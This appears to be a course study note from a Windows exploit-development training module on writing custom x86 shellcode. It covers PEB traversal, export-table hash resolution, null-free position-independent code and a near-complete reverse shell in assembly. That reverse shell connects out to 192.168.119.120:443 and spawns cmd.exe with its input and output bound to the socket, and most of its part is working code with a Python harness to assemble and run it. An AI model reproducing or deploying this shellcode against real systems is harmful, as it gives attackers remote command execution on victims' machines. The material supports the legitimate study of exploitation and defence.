Skip to content

Latest commit

 

History

History
776 lines (613 loc) · 24.7 KB

File metadata and controls

776 lines (613 loc) · 24.7 KB

Creating Custom Shellcode

Table of Contents

  1. Introduction
  2. Calling Conventions on x86
  3. The System Call Problem
  4. Finding kernel32.dll
  5. Resolving Symbols
  6. NULL-Free Position-Independent Shellcode (PIC)
  7. Reverse Shell Implementation
  8. Conclusion

Introduction

In previous modules, various payloads were generated using the Metasploit Framework for exploits. This module focuses on understanding how shellcode works internally and developing custom reverse shells from scratch.

Shellcode is a set of CPU instructions designed to be executed after a vulnerability is successfully exploited. Originally, the term referred to exploit code used to spawn a root shell, but modern shellcode can perform much more complex operations including reverse shells, bind shells, and arbitrary code execution.

Key characteristics of shellcode:

  • Written in assembly language and translated to hexadecimal opcodes
  • Can directly manipulate CPU registers and call system functions
  • Must be universal and reliable across different Windows versions
  • Requires low-level operating system knowledge

Writing effective shellcode for Windows platforms is challenging due to the complexity of the operating system architecture and the need for portability across different versions.


Calling Conventions on x86

Overview

Calling conventions define the schema used to invoke function calls and are critical for shellcode developers. They specify:

  • How arguments are passed to functions
  • Which registers the callee must preserve for the caller
  • How the stack frame is prepared before the call
  • How the stack frame is restored after the call

Key Calling Conventions

__stdcall Convention:

  • Used by Win32 API functions
  • Parameters pushed to stack in reverse order
  • Stack cleaned up by the callee

__cdecl Convention:

  • Used by C runtime functions
  • Parameters pushed to stack in reverse order
  • Stack cleaned up by the caller

Register Volatility

On 32-bit systems, register handling follows specific rules:

Volatile Registers (can be clobbered):

  • EAX, EDX, ECX

Non-volatile Registers (must be preserved):

  • All other registers must be preserved by the callee

Note: "Clobbered" refers to overwriting a CPU register's value during a function call without restoring it to the original value before returning.

graph TD
    A[Function Call] --> B{Calling Convention}
    B -->|__stdcall| C[Win32 API Functions]
    B -->|__cdecl| D[C Runtime Functions]
    C --> E[Callee cleans stack]
    D --> F[Caller cleans stack]
    E --> G[Parameters in reverse order]
    F --> G
Loading

The System Call Problem

System Calls Overview

System calls (syscalls) provide an interface between user space and the protected kernel, allowing access to low-level operating system functions for:

  • Input/Output operations
  • Thread synchronization
  • Socket management
  • Memory management

Windows Native API

The Windows Native API is equivalent to the system call interface on UNIX systems. Key characteristics:

  • Mostly undocumented interface exposed by ntdll.dll
  • Hidden behind higher-level APIs due to NT architecture
  • Supports multiple operating system APIs (Win32, OS/2, POSIX, DOS/Win16)
  • System call numbers change between Windows versions (unlike Linux)

The Challenge

Windows limitations for shellcode development:

  • Limited feature set in system call interface
  • No socket API via direct system calls
  • Need to use Windows API through Dynamic Link Libraries (DLLs)
  • Must avoid hard-coded function addresses for portability

Solution Strategy

flowchart LR
    A[Shellcode Needs] --> B[Avoid Direct Syscalls]
    B --> C[Use Windows API via DLLs]
    C --> D[Load/Locate DLLs in Memory]
    D --> E[Resolve Function Addresses]
    E --> F[Execute Required Functions]
Loading

Essential functions for this process:

  • LoadLibraryA: Load DLLs into memory
  • GetModuleHandleA: Get base address of loaded DLL
  • GetProcAddress: Resolve function symbols
  • kernel32.dll: Contains all necessary APIs (almost always loaded)

Finding kernel32.dll

Why kernel32.dll?

kernel32.dll is the foundation for shellcode development because:

  • Contains LoadLibrary and GetProcAddress APIs
  • Required to load additional DLLs and resolve functions
  • Almost guaranteed to be loaded in process memory
  • Exports core APIs required for most processes

PEB Method

The most reliable technique for determining kernel32.dll base address involves parsing the Process Environment Block (PEB).

PEB Structure Analysis

The PEB is allocated by the operating system for every running process and can be found by traversing process memory starting at the FS register address.

graph TD
    A[FS Register] --> B[Thread Environment Block - TEB]
    B --> C[PEB Pointer at offset 0x30]
    C --> D[PEB Structure]
    D --> E[_PEB_LDR_DATA at offset 0x0C]
    E --> F[Three Linked Lists]
    F --> G[InLoadOrderModuleList]
    F --> H[InMemoryOrderModuleList]
    F --> I[InInitializationOrderModuleList]
Loading

Key Data Structures

_PEB_LDR_DATA Structure:

+0x00c InLoadOrderModuleList
+0x014 InMemoryOrderModuleList  
+0x01c InInitializationOrderModuleList

_LDR_DATA_TABLE_ENTRY Structure:

+0x000 InLoadOrderLinks
+0x008 InMemoryOrderLinks
+0x010 InInitializationOrderLinks
+0x018 DllBase (Base Address)
+0x01c EntryPoint
+0x020 SizeOfImage
+0x024 FullDllName (UNICODE_STRING)
+0x02c BaseDllName (UNICODE_STRING)

Implementation Process

The shellcode traverses the InInitializationOrderModuleList to find kernel32.dll:

  1. Access PEB through FS:[0x30]
  2. Navigate to _PEB_LDR_DATA structure
  3. Iterate through InInitializationOrderModuleList
  4. Compare module names to find "kernel32.dll"
  5. Extract base address from DllBase field

Assembling the Shellcode

The shellcode uses the Keystone Framework for assembly and CTypes for Windows API integration:

Python Setup Code:

import ctypes, struct
from keystone import *

# Initialize Keystone engine in 32-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_32)

# Compile assembly instructions
encoding, count = ks.asm(CODE)
shellcode = bytearray(encoding)

Core Assembly Implementation:

start:
    int3                        ; Breakpoint for debugging
    mov ebp, esp               ; Set up stack frame
    sub esp, 60h               ; Allocate stack space

find_kernel32:
    xor ecx, ecx               ; ECX = 0
    mov esi, fs:[ecx+30h]      ; ESI = &(PEB) 
    mov esi, [esi+0Ch]         ; ESI = PEB->Ldr
    mov esi, [esi+1Ch]         ; ESI = PEB->Ldr.InInitOrder

next_module:
    mov ebx, [esi+8h]          ; EBX = InInitOrder[X].base_address
    mov edi, [esi+20h]         ; EDI = InInitOrder[X].module_name  
    mov esi, [esi]             ; ESI = InInitOrder[X].flink (next)
    cmp [edi+12*2], cx         ; Check if modulename[12] == 0x00
    jne next_module            ; No: try next module

This technique leverages the fact that kernel32.dll is typically the first module initialized, making it reliably discoverable through the InInitializationOrderModuleList.


Resolving Symbols

Export Directory Table

Once kernel32.dll base address is obtained, the next step is resolving exported function addresses. This is accomplished by traversing the Export Address Table (EAT) instead of relying on GetProcAddress.

Export Directory Table Structure

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD Characteristics;
    DWORD TimeDateStamp;
    WORD  MajorVersion;
    WORD  MinorVersion;
    DWORD Name;
    DWORD Base;
    DWORD NumberOfFunctions;
    DWORD NumberOfNames;
    DWORD AddressOfFunctions;      // RVA of function addresses array
    DWORD AddressOfNames;          // RVA of function names array  
    DWORD AddressOfNameOrdinals;   // RVA of ordinals array
} IMAGE_EXPORT_DIRECTORY;

Three Critical Arrays

graph LR
    A[AddressOfNames Array] --> B[Function Names]
    C[AddressOfNameOrdinals Array] --> D[Ordinal Values]
    E[AddressOfFunctions Array] --> F[Function RVAs]
    
    B --> G[Index i]
    G --> D
    D --> H[New Index j]
    H --> F
    F --> I[Function VMA = RVA + DLL Base]
Loading

Working with the Export Names Array

The symbol resolution process follows these steps:

  1. Locate Export Directory Table:

    mov eax, [ebx+3Ch]          ; Offset to PE Signature
    mov edi, [ebx+eax+78h]      ; Export Table Directory RVA
    add edi, ebx                ; Export Table Directory VMA
  2. Access Arrays:

    mov ecx, [edi+18h]          ; NumberOfNames
    mov eax, [edi+20h]          ; AddressOfNames RVA
    add eax, ebx                ; AddressOfNames VMA
    mov [ebp-4], eax            ; Save AddressOfNames VMA
  3. Iterate Through Names:

    find_function_loop:
        jecxz find_function_finished    ; Jump if ECX is 0
        dec ecx                         ; Decrement counter
        mov eax, [ebp-4]               ; Restore AddressOfNames VMA
        mov esi, [eax+ecx*4]           ; Get RVA of symbol name
        add esi, ebx                   ; Set ESI to VMA of symbol name

Computing Function Name Hashes

To optimize shellcode size and enable reusable symbol resolution, a hashing algorithm converts function names to 4-byte hashes.

Hashing Algorithm

compute_hash:
    xor eax, eax               ; NULL EAX
    cdq                        ; NULL EDX  
    cld                        ; Clear direction flag

compute_hash_again:
    lodsb                      ; Load next byte from ESI into AL
    test al, al                ; Check for NULL terminator
    jz compute_hash_finished   ; Jump if NULL terminator found
    ror edx, 0Dh               ; Rotate EDX 13 bits right
    add edx, eax               ; Add byte to accumulator
    jmp compute_hash_again     ; Next iteration

compute_hash_finished:
    ; EDX now contains unique 4-byte hash

Python Hash Generator

#!/usr/bin/python
import numpy, sys

def ror_str(byte, count):
    binb = numpy.base_repr(byte, 2).zfill(32)
    while count > 0:
        binb = binb[-1] + binb[0:-1]
        count -= 1
    return (int(binb, 2))

def compute_hash(function_name):
    edx = 0x00
    ror_count = 0
    
    for eax in function_name:
        edx = edx + ord(eax)
        if ror_count < len(function_name)-1:
            edx = ror_str(edx, 0xd)
        ror_count += 1
    
    return hex(edx)

# Example usage:
# python ComputeHash.py TerminateProcess
# Output: 0x78b5b983

Fetching the VMA of a Function

Once the correct hash is found, retrieve the function's Virtual Memory Address:

find_function_compare:
    cmp edx, [esp+24h]          ; Compare computed hash with target
    jnz find_function_loop      ; If no match, try next function
    
    ; Hash matches - get function address
    mov edx, [edi+24h]          ; AddressOfNameOrdinals RVA
    add edx, ebx                ; AddressOfNameOrdinals VMA
    mov cx, [edx+2*ecx]         ; Get function's ordinal
    mov edx, [edi+1Ch]          ; AddressOfFunctions RVA  
    add edx, ebx                ; AddressOfFunctions VMA
    mov eax, [edx+4*ecx]        ; Get function RVA
    add eax, ebx                ; Get function VMA
    mov [esp+1Ch], eax          ; Store in stack for return

Symbol Resolution Flow:

sequenceDiagram
    participant SC as Shellcode
    participant EDT as Export Directory Table
    participant AN as AddressOfNames
    participant ANO as AddressOfNameOrdinals  
    participant AF as AddressOfFunctions
    
    SC->>EDT: Access Export Directory
    EDT->>AN: Get AddressOfNames array
    SC->>AN: Iterate through function names
    AN->>SC: Return function name
    SC->>SC: Compute hash of name
    SC->>SC: Compare with target hash
    alt Hash matches
        SC->>ANO: Get ordinal using same index
        ANO->>SC: Return ordinal value
        SC->>AF: Use ordinal as index
        AF->>SC: Return function RVA
        SC->>SC: Add DLL base to get VMA
    else Hash doesn't match
        SC->>AN: Try next function name
    end
Loading

NULL-Free Position-Independent Shellcode (PIC)

Avoiding NULL Bytes

NULL bytes (0x00) are problematic in shellcode because they often terminate string operations in vulnerable applications. Several techniques eliminate NULL bytes:

Technique 1: Arithmetic Operations

Instead of:

sub esp, 200h    ; Contains NULL bytes

Use:

add esp, 0xFFFFFDF0    ; Achieves same result without NULL bytes

Technique 2: Instruction Replacement

Replace instructions that generate NULL bytes:

; Avoid CALL instructions with positive offsets
; Use alternative instruction sequences

Position-Independent Shellcode

Position-independent code (PIC) can execute correctly regardless of its memory location. This is achieved by:

Dynamic Address Resolution

find_function_shorten:
    jmp find_function_shorten_bnc    ; Short jump

find_function_ret:
    pop esi                          ; Get return address
    mov [ebp+04h], esi              ; Save for later use
    jmp resolve_symbols_kernel32

find_function_shorten_bnc:
    call find_function_ret           ; Call with negative offset

PIC Implementation Flow:

graph TD
    A[Shellcode Entry] --> B[Short Jump Forward]
    B --> C[Call Backward] 
    C --> D[Push Return Address]
    D --> E[Pop Address into Register]
    E --> F[Calculate Relative Offsets]
    F --> G[Execute Position-Independent Code]
Loading

This technique exploits the fact that:

  • CALL instruction pushes return address onto stack
  • POP retrieves this address for relative calculations
  • Negative offsets typically avoid NULL bytes

Reverse Shell Implementation

Loading ws2_32.dll and Resolving Symbols

To create a reverse shell, the shellcode must load the Winsock library and resolve networking functions.

Required APIs

From kernel32.dll:

  • CreateProcessA (hash: 0x16b3fe72)
  • LoadLibraryA (hash: 0xec0e4e8e)
  • TerminateProcess (hash: 0x78b5b983)

From ws2_32.dll:

  • WSAStartup (hash: 0x3bfcedcb)
  • WSASocketA (hash: 0xadf509d9)
  • WSAConnect (hash: 0x60aaf9ec)

Loading ws2_32.dll

load_ws2_32:
    xor eax, eax               ; NULL EAX
    mov ax, 6C6Ch              ; Move end of string "ll"
    push eax                   ; Push with NULL terminator
    push 642E3233h             ; Push "32.d"
    push 5F327377h             ; Push "ws2_"
    push esp                   ; Push pointer to string
    call dword ptr [ebp+14h]   ; Call LoadLibraryA

resolve_symbols_ws2_32:
    mov ebx, eax               ; Move ws2_32.dll base to EBX
    ; Now resolve individual functions using find_function

Calling WSAStartup

WSAStartup initializes the Winsock DLL for use by the shellcode.

Function Prototype

int WSAStartup(
    WORD wVersionRequired,      // Version 2.2 (0x0202)
    LPWSADATA lpWSAData        // Pointer to WSADATA structure
);

WSADATA Structure

The structure requires approximately 398 bytes (0x18E) of stack space:

call_wsastartup:
    mov eax, esp               ; Current stack pointer
    mov cx, 590h               ; Structure size  
    sub eax, ecx               ; Avoid overwriting
    push eax                   ; Push lpWSAData pointer
    xor eax, eax               ; NULL EAX
    mov ax, 202h               ; Version 2.2
    push eax                   ; Push wVersionRequired
    call dword ptr [ebp+1Ch]   ; Call WSAStartup

Calling WSASocket

Creates a socket for network communication.

Function Prototype

SOCKET WSASocketA(
    int af,                    // Address family (AF_INET = 2)
    int type,                  // Socket type (SOCK_STREAM = 1)  
    int protocol,              // Protocol (IPPROTO_TCP = 6)
    LPWSAPROTOCOL_INFOA lpProtocolInfo,  // NULL
    GROUP g,                   // NULL
    DWORD dwFlags             // NULL
);

Implementation

call_wsasocketa:
    xor eax, eax               ; NULL EAX
    push eax                   ; Push dwFlags (NULL)
    push eax                   ; Push g (NULL)  
    push eax                   ; Push lpProtocolInfo (NULL)
    mov al, 06h                ; IPPROTO_TCP
    push eax                   ; Push protocol
    sub al, 05h                ; AL = 1 (SOCK_STREAM)
    push eax                   ; Push type
    inc eax                    ; EAX = 2 (AF_INET)
    push eax                   ; Push af
    call dword ptr [ebp+20h]   ; Call WSASocketA

Calling WSAConnect

Establishes connection to the target system.

sockaddr_in Structure Setup

typedef struct sockaddr_in {
    short sin_family;          // AF_INET (2)
    USHORT sin_port;          // Port number (443 = 0x01BB)
    IN_ADDR sin_addr;         // IP address (192.168.119.120)
    CHAR sin_zero[8];         // Reserved (NULL)
} SOCKADDR_IN;

Implementation

call_wsaconnect:
    mov esi, eax               ; Save socket descriptor
    xor eax, eax               ; NULL EAX
    push eax                   ; Push sin_zero[4-7]
    push eax                   ; Push sin_zero[0-3]  
    push 7877a8c0h             ; Push sin_addr (192.168.119.120 reversed)
    mov ax, 0bb01h             ; Port 443 in network byte order
    shl eax, 10h               ; Shift to upper 16 bits
    add ax, 02h                ; Add AF_INET
    push eax                   ; Push sin_port & sin_family
    
    ; Get pointer to structure
    push esp                   ; Push pointer to sockaddr_in
    pop edi                    ; Store in EDI
    
    ; Set up remaining parameters
    xor eax, eax               ; NULL EAX
    push eax                   ; Push lpGQOS (NULL)
    push eax                   ; Push lpSQOS (NULL)
    push eax                   ; Push lpCalleeData (NULL)
    push eax                   ; Push lpCallerData (NULL)
    add al, 10h                ; namelen = 16
    push eax                   ; Push namelen
    push edi                   ; Push *name (sockaddr_in)
    push esi                   ; Push socket descriptor
    call dword ptr [ebp+24h]   ; Call WSAConnect

Calling CreateProcessA

Creates the cmd.exe process with redirected I/O handles.

Function Prototype

BOOL CreateProcessA(
    LPCSTR lpApplicationName,           // NULL
    LPSTR lpCommandLine,               // "cmd.exe"
    LPSECURITY_ATTRIBUTES lpProcessAttributes,    // NULL
    LPSECURITY_ATTRIBUTES lpThreadAttributes,     // NULL
    BOOL bInheritHandles,              // TRUE
    DWORD dwCreationFlags,             // NULL
    LPVOID lpEnvironment,              // NULL
    LPCSTR lpCurrentDirectory,         // NULL
    LPSTARTUPINFOA lpStartupInfo,      // Configured structure
    LPPROCESS_INFORMATION lpProcessInformation    // Output structure
);

STARTUPINFOA Structure Setup

The STARTUPINFOA structure (68 bytes) must be configured to redirect standard I/O:

create_startupinfoa:
    push esi                   ; hStdError (socket)
    push esi                   ; hStdOutput (socket)  
    push esi                   ; hStdInput (socket)
    xor eax, eax               ; NULL EAX
    push eax                   ; lpReserved2 (NULL)
    push eax                   ; cbReserved2 & wShowWindow (NULL)
    mov al, 80h                ; STARTF_USESTDHANDLES flag
    xor ecx, ecx               ; NULL ECX
    mov cx, 80h                ; 0x80
    add eax, ecx               ; EAX = 0x100
    push eax                   ; dwFlags (STARTF_USESTDHANDLES)
    
    ; Push remaining NULL fields
    xor eax, eax
    push eax                   ; dwFillAttribute
    push eax                   ; dwYCountChars
    push eax                   ; dwXCountChars  
    push eax                   ; dwYSize
    push eax                   ; dwXSize
    push eax                   ; dwY
    push eax                   ; dwX
    push eax                   ; lpTitle
    push eax                   ; lpDesktop
    push eax                   ; lpReserved
    mov al, 44h                ; Structure size (68 bytes)
    push eax                   ; cb
    
    push esp                   ; Get pointer to structure
    pop edi                    ; Store in EDI

Command String Creation

create_cmd_string:
    mov eax, 0ff9a879bh        ; Negative value to avoid NULL
    neg eax                    ; EAX = 00657865 ("exe\0")
    push eax                   ; Push "exe\0"
    push 2E646D63h             ; Push "cmd."
    push esp                   ; Get pointer to "cmd.exe"
    pop ebx                    ; Store in EBX

Final CreateProcessA Call

call_createprocessa:
    mov eax, esp               ; Current stack pointer
    xor ecx, ecx               ; NULL ECX
    mov cx, 390h               ; Reserve space for PROCESS_INFORMATION
    sub eax, ecx               ; Calculate lpProcessInformation
    push eax                   ; Push lpProcessInformation
    push edi                   ; Push lpStartupInfo
    
    ; Push NULL parameters
    xor eax, eax               ; NULL EAX
    push eax                   ; lpCurrentDirectory
    push eax                   ; lpEnvironment  
    push eax                   ; dwCreationFlags
    inc eax                    ; EAX = 1 (TRUE)
    push eax                   ; bInheritHandles
    dec eax                    ; EAX = 0 (NULL)
    push eax                   ; lpThreadAttributes
    push eax                   ; lpProcessAttributes
    push ebx                   ; lpCommandLine ("cmd.exe")
    push eax                   ; lpApplicationName (NULL)
    call dword ptr [ebp+18h]   ; Call CreateProcessA

Complete Shellcode Architecture

graph TD
    A[Shellcode Entry Point] --> B[Find kernel32.dll via PEB]
    B --> C[Resolve kernel32 symbols]
    C --> D[Load ws2_32.dll]
    D --> E[Resolve ws2_32 symbols]
    E --> F[Call WSAStartup]
    F --> G[Call WSASocketA]
    G --> H[Call WSAConnect] 
    H --> I[Create STARTUPINFOA]
    I --> J[Call CreateProcessA]
    J --> K[Reverse Shell Active]
    
    subgraph "Symbol Resolution Process"
        L[Hash Function Name] --> M[Search Export Table]
        M --> N[Compare Hashes]
        N -->|Match| O[Get Function Address]
        N -->|No Match| P[Try Next Function]
        P --> M
    end
Loading

Key Implementation Notes

Memory Management

  • Always preserve non-volatile registers
  • Use stack space efficiently to avoid overwrites
  • Calculate proper offsets for structure storage

Error Handling

  • Check return values for API success
  • Handle edge cases in symbol resolution
  • Ensure graceful shellcode termination

Optimization Techniques

  • Reuse assembly instruction sequences
  • Minimize shellcode size through efficient coding
  • Use negative offsets to avoid NULL bytes

Security Considerations

  • Avoid hardcoded addresses for portability
  • Handle ASLR (Address Space Layout Randomization)
  • Ensure compatibility across Windows versions

Conclusion

This module demonstrated the complete process of creating custom Windows shellcode from scratch. Key learning outcomes include:

  1. Understanding Windows Architecture: How DLLs, APIs, and system calls interact
  2. Dynamic Symbol Resolution: Avoiding hardcoded addresses through PEB traversal and EAT parsing
  3. Position-Independent Code: Creating shellcode that works regardless of memory location
  4. NULL-Byte Avoidance: Techniques to eliminate problematic bytes from shellcode
  5. Practical Implementation: Building a functional reverse shell using Windows networking APIs

The techniques covered provide a foundation for developing reliable, portable shellcode for Windows environments. While this implementation prioritizes clarity and understanding over size optimization, the same principles apply to creating more compact shellcode variants.

Advanced Topics for Further Study:

  • Shellcode encoders and decoders
  • Anti-debugging and evasion techniques
  • 64-bit shellcode development
  • Advanced payload staging techniques